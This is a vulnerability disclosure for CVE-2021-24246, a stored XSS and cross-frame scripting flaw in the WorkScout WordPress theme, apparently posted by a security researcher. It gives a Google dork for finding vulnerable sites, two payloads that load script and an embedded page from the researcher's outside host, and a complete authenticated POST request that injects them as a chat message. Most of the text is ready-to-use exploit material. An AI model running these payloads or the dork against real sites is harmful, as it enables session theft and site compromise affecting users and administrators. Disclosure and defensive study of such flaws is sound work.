/*!
- # VULNERABILITY: WorkScout WordPress Theme <= 2.0.33 - Authenticated Persistent XSS & XFS
- # GOOGLE DORK: inurl:/wp-content/themes/workscout/
- # DATE: 2021-02-10
- # SECURITY RESEARCHER: m0ze [ https://m0ze.ru ]
- # VENDOR: Purethemes [ https://purethemes.net ]
- # SOFTWARE VERSION: <= 2.0.33
- # SOFTWARE LINK: https://themeforest.net/item/workscout-job-board-wordpress-theme/13591801
- # CVSS: AV:N/AC:L/PR:L/UI:N/S:C
- # CWE: CWE-79
- # CVE: CVE-2021-24246
*/



### -- [ Info: ]

[i] An Authenticated Persistent XSS & XFS vulnerabilities was discovered in the WorkScout theme through v2.0.33 for WordPress.

[i] Plugin(s) affected: Workscout Core <= 1.3.3 by Purethemes [ https://purethemes.net ].

[i] Malicious JavaScript code or iFrame can be injected as a chat message.



### -- [ Impact: ]

[~] Malicious JavaScript code or iFrame injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.



### -- [ Payloads: ]

[$] <!-->"><script src=https://m0ze.ru/payload/a.js></script>

[$] <!-->"><!--><embed src=https://m0ze.ru/payload/xfsii.html>



### -- [ PoC | Authenticated Persistent XSS & XFS | Chat messages: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: workscout.in
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://workscout.in/messages/?action=view&conv_id=163
Cookie: [user cookies]

action=workscout_send_message_chat&recipient=3&conversation_id=163&message=%3C!--%3E%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fa.js%3E%3C%2Fscript%3E%3C!--%3E%3Cembed%20src%3Dhttps%3A%2F%2Fm0ze.ru%2Fpayload%2Fxfsii.html%3E



### -- [ Contacts: ]

[+] Website: m0ze.ru
[+] GitHub: @m0ze
[+] Telegram: @m0ze_ru
[+] Twitter: @vladm0ze